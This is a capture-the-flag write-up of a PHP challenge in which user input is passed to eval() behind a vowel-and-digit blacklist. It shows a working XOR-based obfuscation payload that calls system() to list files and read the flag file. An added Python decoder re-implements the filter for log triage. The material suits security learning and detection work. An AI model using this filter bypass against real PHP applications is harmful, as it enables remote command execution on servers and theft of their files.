You have found this page, which seems strange to you. Can you convince us that there really is a problem by finding the flag present on the server?

There’s a strange page and we have to find the flag on the server.

<?php
    if (isset($_GET['code'])) {
        $code = substr($_GET['code'], 0, 250);
        if (preg_match('/a|e|i|o|u|y|[0-9]/i', $code)) {
            die('No way! Go away!');
        } else {
            try {
                eval($code);
            } catch (ParseError $e) {
                die('No way! Go away!');
            }
        }
    } else {
        show_source(__FILE__);
    }

Exploit

We have a GET parameter that is passed to eval if it does not contain any vowel (a, e, i, o, u, y) or digit; without the parameter, the page prints its own source code.

Thanks to eval we can execute any PHP function, so we have to find a way to bypass the regex.

PHP can convert an array to the string "Array" and allows bitwise operations on strings (the payload below XORs single characters together), so we can build any command we want without ever typing a vowel or a digit.

We can use this tool to create our payload.

So basically, what we want to do is execute commands with the PHP function system, like system('ls -alh') or system('cat flag.txt').

So let’s start by encoding system with our tool:

magnussen@funcMyLife:~/lipogrammeurs$ python alpha_exploit.py system xor "aeiouy0123456789"
============================================================ mucomplex ============================================================
('('^'[').('['^'"').('['^'(').('['^'/').('['^'>').('-'^'@')
magnussen@funcMyLife:~/lipogrammeurs$ python alpha_exploit.py 'ls -alh' xor "aeiouy0123456789"
============================================================ mucomplex ============================================================
(','^'@').(','^'_').('@'^'`')."-".('['^':').(','^'@').('@'^'(')

So our payload is:

$s=('('^'[').('['^'"').('['^'(').('['^'/').('['^'>').('-'^'@'); // system
$l=(','^'@').(','^'_').('@'^'`')."-".('['^':').(','^'@').('@'^'('); // ls -alh
$s($l); // system('ls -alh')

[Screenshot: output of system('ls -alh')]

Nice, it works. Now we just have to encode the cat command the same way.

magnussen@funcMyLife:~/lipogrammeurs$ python alpha_exploit.py 'cat' xor "aeiouy0123456789"
============================================================ mucomplex ============================================================
('#'^'@').(':'^'[').('['^'/')

So our final payload will be:

$s=('('^'[').('['^'"').('['^'(').('['^'/').('['^'>').('-'^'@'); // system
$c=('#'^'@').(':'^'[').('['^'/'); // cat
$s($c.' .fl*'); // system('cat .fl*')
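To see what such a request actually evaluates to, which is what you need when triaging a request log or a WAF hit, here is a small Python decoder. It is added here and is not part of the original writeup or of the alpha_exploit.py tool: it re-implements the challenge's blacklist check and reverses the XOR/concatenation chain, resolving the $s and $c variables of the final payload above.

```python
import re

# Blacklist from the challenge source: any vowel, 'y' or digit stops the code before eval().
BLACKLIST = re.compile(r'a|e|i|o|u|y|[0-9]', re.I)
# One building block of the obfuscated expression: ('x'^'y'), a "..."/'...' literal, or $var.
TERM = re.compile(r"""\('(.)'\^'(.)'\)|"([^"]*)"|'([^']*)'|\$(\w+)""")

def strip_comments(payload: str) -> str:
    """Drop the // comments the writeup adds; the submitted code could not contain them (vowels)."""
    return '\n'.join(line.split('//')[0].rstrip() for line in payload.splitlines())

def passes_filter(code: str) -> bool:
    """True if this code would get past the blacklist and be eval()'d."""
    return BLACKLIST.search(code) is None

def decode_expr(expr: str, env: dict) -> str:
    """Evaluate a '.'-concatenation of XOR terms, literals and $vars to the string PHP builds."""
    out = []
    for m in TERM.finditer(expr):
        xor_a, xor_b, dq, sq, var = m.groups()
        if xor_a is not None:
            out.append(chr(ord(xor_a) ^ ord(xor_b)))  # PHP XORs strings byte by byte
        elif var is not None:
            out.append(env.get(var, '$' + var))       # unknown variables stay symbolic
        else:
            out.append(dq if dq is not None else sq)
    return ''.join(out)

def decode_payload(payload: str) -> list:
    """Resolve $var=... assignments and render each $f(...) call as plain text.
    Assumes ';' only separates statements, which holds for the payload above."""
    env, calls = {}, []
    for stmt in strip_comments(payload).split(';'):
        stmt = stmt.strip()
        if not stmt:
            continue
        if (m := re.fullmatch(r'\$(\w+)=(.*)', stmt)):
            env[m.group(1)] = decode_expr(m.group(2), env)
        elif (m := re.fullmatch(r'\$(\w+)\((.*)\)', stmt)):
            fn = env.get(m.group(1), '$' + m.group(1))
            calls.append(f"{fn}({decode_expr(m.group(2), env)})")
    return calls

# The final payload from the writeup, comments included.
PAYLOAD = """$s=('('^'[').('['^'"').('['^'(').('['^'/').('['^'>').('-'^'@'); // system
$c=('#'^'@').(':'^'[').('['^'/'); // cat
$s($c.' .fl*'); // system('cat .fl*')"""
```

decode_payload(PAYLOAD) returns ['system(cat .fl*)'], and passes_filter shows why the plain form is blocked while the XOR form is not.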

[Screenshot: the flag file content]

Nice, we have our flag: FCSC{53d195522a15aa0ce67954dc1de7c5063174a721ee5aa924a4b9b15ba1ab6948}.

This was a nice challenge, not very difficult but a classic CTF challenge.

Thanks to the FCSC team, this was an awesome CTF, I've learned a lot and had a lot of fun. Congratulations on the organization, see you next year!